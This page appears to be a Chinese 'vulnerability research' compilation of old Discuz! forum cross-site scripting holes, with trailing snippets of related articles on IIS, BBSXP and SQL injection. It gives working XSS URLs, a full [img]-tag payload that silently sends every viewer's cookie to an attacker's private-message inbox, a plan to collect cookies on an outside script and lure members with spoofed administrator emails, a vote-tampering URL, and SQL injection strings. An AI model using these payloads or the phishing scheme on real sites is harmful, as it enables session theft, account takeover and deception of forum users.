PHP著名开源论坛:Discuz!跨站大全_漏洞研究

在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。  

例如  

http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22  

效果是首先弹出自己的cookie  

利用方法:把上述代码放置到img中。  

适用版本:discuz!2.x  

discuz!3.x  

一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试  

通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下:  

XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan)  

http://XXX/pm.php?action=send&username=XXXFan  

因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如  

http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script><b%20"  

上面的链接点击以后首先弹出的是自己的cookie内容。  

当然我们可以先在自己的站点上构造一个程序来收集cookie,类似于  

getcookie.php?cookie=  

但是如何来诱使会员点击呢,如果简单的放在论坛上,太容易被识别。所以可以利用discuz论坛程序的另外一个功能,“帖子介绍给朋友”功能。  

因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版,可以伪造任何人给别人发信,安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信,诱使会员点击我们准备的URL,如果诱使就看自己的手段了,例如可以说“论坛正在测试新功能,请您协助点击上面地址,我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励”等等。  

因为链接地址是XXXFan的,而且发信人和邮件地址都是XXXFan的官方地址,所以可信度非常高,而且不会留下任何把柄。当然为了更高的安全性,可以在<script>里的内容加密,以进一步增加隐蔽性。  

至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码  

本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz!悄悄话漏洞  

【BUG】Discuz!投票的BUG  

投票可以用  

misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n  

(n为选项,从0开始)  

的方式通过URL来直接投票  

但是如果n>最大选项呢,嘻嘻~  

照样提交成功,不过增加了一个标题为空的选项  

效果见:  

http://discuz.net/viewthread.php?tid=20020&sid=dymPEc  

(那个最后的空白的是我刚加的)  

该漏洞存在的版本:  

Discuz!3.X  

Discuz!2.X(可能,没有测试过)  

Discuz!的代码漏洞  

这是接着昨天发现的漏洞所展开的,第一发现者(PK0909)。  

具体的描述就不说了,下面是一个简单的测试代码。  

http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E  

上面的代码是显示出自己的cookie  

下面是在某个比较有名的论坛的测试代码,无论谁察看该网页都会把cookie送到指定的会员短信箱里,隐蔽性很好,就是如果有人引用你的贴,哈哈~这里都会跑出来,露馅了  

[ img]yun_qi_img/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document..cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]  

发现discuz!UT 跨域站点的脚本漏洞--短消息篇有关跨域站点的脚本漏洞,已经算是非常平成并普遍的漏洞了。  

有关具体的消息可以参阅:  

http://www.cert.org/advisories/CA-2000-02.html  

下面针对Discuz、UT论坛程序的悄悄话部分加以说明  

漏洞适应版本:  

Discuz1.X  

Discuz!2.0(0609,0820版)  

Discuz!3.X  

UT 1.0  

漏洞描述:  

discuz!给指定会员发送悄悄话使用的是类似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的语句,但是name没有经过过滤直接显示在发送短消息的页面中,这就给偷cookie或者更严重的破坏打开了方便之门。  

Discuz!3.X已经改为http://XXX.net/pm.php?action=send&uid=XXXX类似的语句,避免了这个漏洞,但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞  

例  

http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document..cookie)%3C/script%3E%3Cb%22[/url]  

,上面的例子是显示自己的cookie。(针对Discuz!1.X Discuz!2.X)  

http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22  

显示自己的cookie。(针对Discuz!3.X)  

UT虽然在主题上经过了过滤,也就是说把%27转换为';但是其收件人却没有过滤,所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同,但是总的来说都有类似的漏洞)  

危害度:中弱  

预防办法:  

点击超级链接时请注意其真实内容。更多的安全补丁请密切关注官方论坛。 

时间: 2024-08-03 07:00:13

PHP著名开源论坛:Discuz!跨站大全_漏洞研究的相关文章

IIS漏洞整理大全_漏洞研究

去年下半年关于IIS的漏洞层出不穷,鉴于目前IIS的广泛使用,觉得有必要把收集的资料加以总结一下.  1.介绍  这里介绍的方法主要通过端口80来完成操作,具有很大的威胁性,因为作为网络服务器80端口总要打开的.如果想方便一些,下载一些WWW.CGI扫描器来辅助检查.  而且要知道目标机器运行的是何种服务程序,你可以使用以下命令:  telnet <目标机> 80  GET HEAD / HTTP/1.0  就可以返回一些域名和WEB服务程序版本,如果有些服务器把WEB服务运行在8080,81

BBSXP5.15跨站攻击漏洞_漏洞研究

前言:在新云网站管理系统1.02出来的时候,他的留言本就存在跨站漏洞,我测试了黑客动画吧,还好没有开放留言本功能,然后又测试了黑软基地 居然可以成功利用,和新云官方网站都成功拿倒了管理元的cookies.  想不到吧. 看来跨站不得不防范啊!  BBSXP的漏洞近段时间闹得可火.现有的漏洞大家都见过了,就不说了.今晚无聊,看了看BBSXP 5.15最新版的几个文件代码,发现还是存在跨站攻击的漏洞.  Cookies.asp文件,代码如下:   对提交的 "no" 参数没做处理.再看se

也谈一个跨站的利用_漏洞研究

1.方法: 网易同学录留言功能存在跨站,这里演示一个利用它把自己加为班级管理员的方法. 在留言框里填写: +++try%20%7B%0D%0A%09var%20as%20%3D%20document.getElementsByTagName%28%22a%22%29%3B%0D%0A%09var%20frm%20%3D%20document.getElementsByTagName%28%22iframe%22%29%5B0%5D%3B%0D%0A%09frm.onload%20%3D%20fu

Discuz!跨站大全

在discuz!的发贴.回贴.PM等中的subject都没有经过过滤,所以也可以添加代码. 例如 http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用方法:把上述代码放置到img中. 适用版本:discuz!2.x discuz!3.x 一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下: XXXFan的给某个会

获得leadbbs论坛站webshell后进后台最简便之法_漏洞研究

本文已经发表于<黑客手册>(非安全)杂志上,版权归其所有!转载注名!  其实ASP论坛中,我最喜欢就是leadbbs,稳定.速度快,占的空间也不大,比起庞大的DVBBS可小多了,说起安全来,它也很不错的,虽然在早版本里有过可以修改管理员密码的漏洞(俗称移花接木),但是从那至今它的安全性还是非常可以让大家肯定的,可能你会说前几天开始闹cookie欺骗漏洞呢,但是这最多也只是进了前台,后台一般还是无能为力的,高手在其面前也不得不服啊.呵呵,上面是题外话,今天我不是详说它安全性的,{www.xker

Discuz!论坛install.php书写错误漏洞_漏洞研究

书写错误,导致恶意用户构造语句可以写入webshell,进而控制整个服务器.    前几个晚上,把前台文件,只要是数据库调用中的变量都看了一遍.看看是不是有过滤不严的地方,看完后觉得,过滤不严的地方的确不少,但是都已经被单引号保护起来了.在php中,如果magic_qoute_gpc=on(默认的)编译器会自动把单引号等特殊字符转义,而这个时候我们想改变程序的执行流程是非常困难的.这样大大的增加了入侵的难度,在某种程度上,也的确保证了其安全.这也是为什么朋友提出一定要在magic_qoute_g

跨站脚本攻击+Cookies欺骗(Discuz篇)_漏洞研究

这次我拿Discuz示范给大家看,首先我们都知道,Discuz在pm.php的程式中,并没有对    会员名字做过滤,导致我们可以写入一些script.    聪明的同学们,想到了吗?我们正可以利用这个漏洞写一段获取cookies的script.    这是要像看到颜色 就会反应的!(取自 数学补习班= =")    所以我们先从本端 获取自己cookies看看...    例句:    http://www.abc.com/pm.php?action=send&username=看啥?

蓝雨设计整站SQL注入漏洞_漏洞研究

本来是投稿文章来的,因为稿件的问题所以就上不了杂志,再加上最近有些人在网站留言说三道四的猜测蓝雨的问题,所以我就公开漏洞预警所说的漏洞,官方已经把版本都打了补丁,当然有些使用网站至今还是存在着SQL注入漏洞的,所以一切后果与我以及BCT小组无关  最近无聊,在网上走来走去看看.发现现在的整站系统可是越来越多了,修改版本等等的N多阿!而蓝雨设计整站的使用者也越来越多了,蓝雨整站系统是从NOWA 0.94修改而来的!基于NOWA的系统不单指蓝雨一个还有很多的!我在此就不一一列举了,核心都是一样,只是

SQL Server 2000 注入防护大全(二)_漏洞研究

SQL Server 2000 注入防护大全(二) 传统查询构造:select * FROM news where id=... AND topic=... AND .....admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'select 123;--;use master;--:a' or name like